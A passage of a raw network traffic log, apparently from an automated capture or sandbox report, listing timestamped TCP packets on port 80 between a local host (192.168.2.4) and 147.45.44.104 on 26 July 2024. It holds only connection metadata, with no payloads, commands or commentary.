Jul 26, 2024 18:56:48.637664080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637674093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637675047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637686968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637689114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637700081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637711048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637715101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637723923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637732983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637741089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637763023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637784958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.638618946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638632059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638642073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638653040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638664961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638664961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.638678074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638689995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638693094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.638701916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638712883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.638712883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638726950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638732910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.638739109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638751030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638751984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.638763905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638775110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.638777018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.638802052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.639554024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639566898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639576912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639589071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639600992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639600992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.639614105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639616013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.639627934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639640093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639642954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.639652014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639663935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639668941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.639676094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639688015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639688015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.639700890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639704943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.639713049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639724970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.639731884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.639755964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.639772892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.640445948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.640459061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.640469074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.640486956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.640499115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.640511036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.640516043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.640516043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.640522003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.640537977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.640554905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.641000986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641014099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641025066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641036987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641042948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.641048908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641062021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641068935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.641073942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641086102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641096115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641097069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.641108036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641119003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641119957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.641133070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641139030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.641145945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641155958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.641159058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.641182899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.641205072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.642074108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642086983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642097950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642107964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642116070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.642118931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642132998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642134905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.642144918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642155886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642158031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.642168045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642177105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.642179012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642191887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642194033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.642204046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642215014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642218113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.642227888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642239094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.642246962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.642271996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643028975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643042088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643052101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643064022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643070936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643075943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643089056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643099070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643101931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643115044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643120050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643127918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643136978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643140078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643151045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643161058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643162012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643174887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643186092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643187046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643201113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643225908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643773079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643786907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643795967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643807888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643816948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643820047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643832922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643845081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.643846035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643870115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.643894911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644248962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644268036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644279957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644285917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644294024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644304037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644306898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644318104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644320011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644332886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644347906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644362926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644366980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644380093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644391060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644401073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644402027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644414902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644414902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644427061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644431114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644438982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644449949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644449949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.644474983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.644509077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.645312071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645324945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645335913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645345926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645354033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.645359039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645370960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.645370960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645385027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645395041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.645396948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645409107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645410061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.645421028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645431995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645435095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.645445108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645456076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645462990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.645467997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645478964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.645479918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.645503044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.645525932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.646254063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646266937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646276951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646287918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646296024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.646300077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646312952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646322966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.646325111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646337032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.646337032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646349907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646362066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646363020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.646373034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646387100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646387100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.646398067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646399975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.646410942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.646425009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.646449089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.647136927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647150993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647161961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647171974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647175074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.647183895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647195101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647197962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.647207975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647222042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.647238016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.647855997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647867918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647878885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647890091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647897959 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.647902012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647912025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.647914886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647927999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647938013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.647938967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647952080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647963047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647964001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.647974014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647977114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.647986889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.647999048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648003101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.648010969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648029089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.648044109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.648711920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648725033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648736954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648746967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648757935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648761034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.648768902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648782015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648789883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.648794889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648806095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648807049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.648818970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648828983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.648832083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648844957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648854971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648865938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648878098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.648897886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.648941040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.648941040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.648941994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649034977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649220943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649661064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649673939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649684906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649696112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649699926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649707079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649714947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649720907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649730921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649732113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649744987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649749041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649756908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649768114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649769068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649780989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649784088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649792910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649801016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649805069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649816036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649816036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649830103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649830103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.649844885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.649861097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.650542974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.650556087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.650566101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.650578976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.650584936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.650590897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.650602102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.650604963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.650616884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.650618076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.650633097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.650648117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.650980949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.650993109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651002884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651015043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651021004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.651036024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651040077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.651048899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651052952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.651061058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651067972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.651073933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651082993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.651087046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651099920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651099920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.651110888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651119947 CEST	49757	80	192.168.2.4	147.45.44.104
